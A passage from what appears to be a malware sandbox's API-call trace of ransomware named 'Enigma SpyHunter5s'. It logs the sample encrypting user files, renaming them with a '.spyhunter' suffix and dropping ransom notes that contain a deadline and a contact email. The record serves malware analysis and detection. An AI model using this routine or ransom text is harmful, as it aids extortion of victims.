lpNumberOfBytesWritten=0x270eb6c*=0x30, lpOverlapped=0x0) returned 1 [0156.229] CloseHandle (hObject=0xa0) returned 1 [0156.230] GetProcessHeap () returned 0x2c0000 [0156.230] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0156.230] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSD-CNRY.FSD.spyhunter") returned 108 [0156.230] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSD-CNRY.FSD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\14.0\\officefilecache\\fsd-cnry.fsd"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSD-CNRY.FSD.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\14.0\\officefilecache\\fsd-cnry.fsd.spyhunter")) returned 1 [0156.231] GetProcessHeap () returned 0x2c0000 [0156.231] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0156.231] GetProcessHeap () returned 0x2c0000 [0156.231] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0156.231] GetProcessHeap () returned 0x2c0000 [0156.231] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2a5d8 | out: hHeap=0x2c0000) returned 1 [0156.231] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270eba8 | out: pbBuffer=0x270eba8) returned 1 [0156.231] GetProcessHeap () returned 0x2c0000 [0156.231] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0156.231] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270eba0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270eba0*=0x30) returned 1 [0156.231] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\02_Music_added_in_the_last_month.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\02_music_added_in_the_last_month.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0156.232] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\02_Music_added_in_the_last_month.wpl") returned 137 [0156.232] StrStrW (lpFirst="02_Music_added_in_the_last_month.wpl", lpSrch=".txt") returned 0x0 [0156.232] GetProcessHeap () returned 0x2c0000 [0156.232] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0156.232] ReadFile (in: hFile=0xa0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270eb64, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270eb64*=0x4ff, lpOverlapped=0x0) returned 1 [0156.237] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffb01, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.237] WriteFile (in: hFile=0xa0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x4ff, lpNumberOfBytesWritten=0x270eb64, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270eb64*=0x4ff, lpOverlapped=0x0) returned 1 [0156.237] GetProcessHeap () returned 0x2c0000 [0156.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0156.237] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.237] WriteFile (in: hFile=0xa0, lpBuffer=0x270eba4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270eb64, lpOverlapped=0x0 | out: lpBuffer=0x270eba4*, lpNumberOfBytesWritten=0x270eb64*=0x4, lpOverlapped=0x0) returned 1 [0156.238] WriteFile (in: hFile=0xa0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270eb64, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x270eb64*=0x30, lpOverlapped=0x0) returned 1 [0156.238] CloseHandle (hObject=0xa0) returned 1 [0156.238] GetProcessHeap () returned 0x2c0000 [0156.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0156.238] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\02_Music_added_in_the_last_month.wpl.spyhunter") returned 147 [0156.238] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\02_Music_added_in_the_last_month.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\02_music_added_in_the_last_month.wpl"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\02_Music_added_in_the_last_month.wpl.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\02_music_added_in_the_last_month.wpl.spyhunter")) returned 1 [0156.238] GetProcessHeap () returned 0x2c0000 [0156.239] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0156.239] GetProcessHeap () returned 0x2c0000 [0156.239] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0156.239] GetProcessHeap () returned 0x2c0000 [0156.239] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc9618 | out: hHeap=0x2c0000) returned 1 [0156.239] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270eba8 | out: pbBuffer=0x270eba8) returned 1 [0156.239] GetProcessHeap () returned 0x2c0000 [0156.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0156.239] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270eba0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270eba0*=0x30) returned 1 [0156.239] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\LocalMLS_3.wmdb" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\localmls_3.wmdb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0156.239] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\LocalMLS_3.wmdb") returned 86 [0156.239] StrStrW (lpFirst="LocalMLS_3.wmdb", lpSrch=".txt") returned 0x0 [0156.239] GetProcessHeap () returned 0x2c0000 [0156.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0156.240] ReadFile (in: hFile=0xa0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270eb64, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270eb64*=0x2800, lpOverlapped=0x0) returned 1 [0156.255] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.255] WriteFile (in: hFile=0xa0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270eb64, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270eb64*=0x2800, lpOverlapped=0x0) returned 1 [0156.256] GetProcessHeap () returned 0x2c0000 [0156.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0156.256] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.256] WriteFile (in: hFile=0xa0, lpBuffer=0x270eba4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270eb64, lpOverlapped=0x0 | out: lpBuffer=0x270eba4*, lpNumberOfBytesWritten=0x270eb64*=0x4, lpOverlapped=0x0) returned 1 [0156.282] WriteFile (in: hFile=0xa0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270eb64, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x270eb64*=0x30, lpOverlapped=0x0) returned 1 [0156.282] CloseHandle (hObject=0xa0) returned 1 [0156.282] GetProcessHeap () returned 0x2c0000 [0156.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0156.282] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\LocalMLS_3.wmdb.spyhunter") returned 96 [0156.282] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\LocalMLS_3.wmdb" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\localmls_3.wmdb"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\LocalMLS_3.wmdb.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\localmls_3.wmdb.spyhunter")) returned 1 [0156.283] GetProcessHeap () returned 0x2c0000 [0156.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0156.283] GetProcessHeap () returned 0x2c0000 [0156.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0156.283] GetProcessHeap () returned 0x2c0000 [0156.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f39320 | out: hHeap=0x2c0000) returned 1 [0156.283] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0156.305] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0156.305] WriteFile (in: hFile=0x9c, lpBuffer=0x270ead7*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270ec00, lpOverlapped=0x0 | out: lpBuffer=0x270ead7*, lpNumberOfBytesWritten=0x270ec00*=0x127, lpOverlapped=0x0) returned 1 [0156.306] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0156.306] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270ec00, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270ec00*=0x2ac, lpOverlapped=0x0) returned 1 [0156.306] CloseHandle (hObject=0x9c) returned 1 [0156.306] GetProcessHeap () returned 0x2c0000 [0156.306] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2ab50 | out: hHeap=0x2c0000) returned 1 [0156.306] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\FKLUIDU0\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore\\fkluidu0\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0156.307] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0156.307] WriteFile (in: hFile=0x9c, lpBuffer=0x270ead3*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270ebfc, lpOverlapped=0x0 | out: lpBuffer=0x270ead3*, lpNumberOfBytesWritten=0x270ebfc*=0x127, lpOverlapped=0x0) returned 1 [0156.308] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0156.308] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270ebfc, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270ebfc*=0x2ac, lpOverlapped=0x0) returned 1 [0156.308] CloseHandle (hObject=0x9c) returned 1 [0156.308] GetProcessHeap () returned 0x2c0000 [0156.308] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fbc2a0 | out: hHeap=0x2c0000) returned 1 [0156.308] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270eb98 | out: pbBuffer=0x270eb98) returned 1 [0156.308] GetProcessHeap () returned 0x2c0000 [0156.308] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0156.308] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270eb90*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270eb90*=0x30) returned 1 [0156.308] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\FKLUIDU0\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0156.308] GetProcessHeap () returned 0x2c0000 [0156.308] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0156.308] GetProcessHeap () returned 0x2c0000 [0156.308] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2a808 | out: hHeap=0x2c0000) returned 1 [0156.308] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270eb98 | out: pbBuffer=0x270eb98) returned 1 [0156.309] GetProcessHeap () returned 0x2c0000 [0156.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0156.309] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270eb90*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270eb90*=0x30) returned 1 [0156.309] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\FKLUIDU0\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore\\fkluidu0\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0156.309] GetProcessHeap () returned 0x2c0000 [0156.309] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0156.309] GetProcessHeap () returned 0x2c0000 [0156.309] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4bb98 | out: hHeap=0x2c0000) returned 1 [0156.309] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\8NES5H33\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore\\8nes5h33\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0156.310] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0156.310] WriteFile (in: hFile=0x9c, lpBuffer=0x270eac7*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270ebf0, lpOverlapped=0x0 | out: lpBuffer=0x270eac7*, lpNumberOfBytesWritten=0x270ebf0*=0x127, lpOverlapped=0x0) returned 1 [0156.311] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0156.311] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270ebf0, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270ebf0*=0x2ac, lpOverlapped=0x0) returned 1 [0156.311] CloseHandle (hObject=0x9c) returned 1 [0156.311] GetProcessHeap () returned 0x2c0000 [0156.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fbc178 | out: hHeap=0x2c0000) returned 1 [0156.311] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270eb90 | out: pbBuffer=0x270eb90) returned 1 [0156.311] GetProcessHeap () returned 0x2c0000 [0156.311] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0156.311] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270eb88*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270eb88*=0x30) returned 1 [0156.311] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\8NES5H33\\get.adobe[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore\\8nes5h33\\get.adobe[1].xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0156.312] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\8NES5H33\\get.adobe[1].xml") returned 110 [0156.312] StrStrW (lpFirst="get.adobe[1].xml", lpSrch=".txt") returned 0x0 [0156.312] GetProcessHeap () returned 0x2c0000 [0156.312] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0156.312] ReadFile (in: hFile=0x9c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270eb4c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270eb4c*=0xd, lpOverlapped=0x0) returned 1 [0156.313] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffffff3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.313] WriteFile (in: hFile=0x9c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xd, lpNumberOfBytesWritten=0x270eb4c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270eb4c*=0xd, lpOverlapped=0x0) returned 1 [0156.313] GetProcessHeap () returned 0x2c0000 [0156.313] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0156.313] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.313] WriteFile (in: hFile=0x9c, lpBuffer=0x270eb8c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270eb4c, lpOverlapped=0x0 | out: lpBuffer=0x270eb8c*, lpNumberOfBytesWritten=0x270eb4c*=0x4, lpOverlapped=0x0) returned 1 [0156.313] WriteFile (in: hFile=0x9c, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270eb4c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x270eb4c*=0x30, lpOverlapped=0x0) returned 1 [0156.313] CloseHandle (hObject=0x9c) returned 1 [0156.313] GetProcessHeap () returned 0x2c0000 [0156.313] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0156.313] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\8NES5H33\\get.adobe[1].xml.spyhunter") returned 120 [0156.313] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\8NES5H33\\get.adobe[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore\\8nes5h33\\get.adobe[1].xml"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\8NES5H33\\get.adobe[1].xml.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore\\8nes5h33\\get.adobe[1].xml.spyhunter")) returned 1 [0156.314] GetProcessHeap () returned 0x2c0000 [0156.314] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0156.314] GetProcessHeap () returned 0x2c0000 [0156.314] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0156.314] GetProcessHeap () returned 0x2c0000 [0156.314] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fbc050 | out: hHeap=0x2c0000) returned 1 [0156.314] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270eb88 | out: pbBuffer=0x270eb88) returned 1 [0156.314] GetProcessHeap () returned 0x2c0000 [0156.314] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0156.315] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, 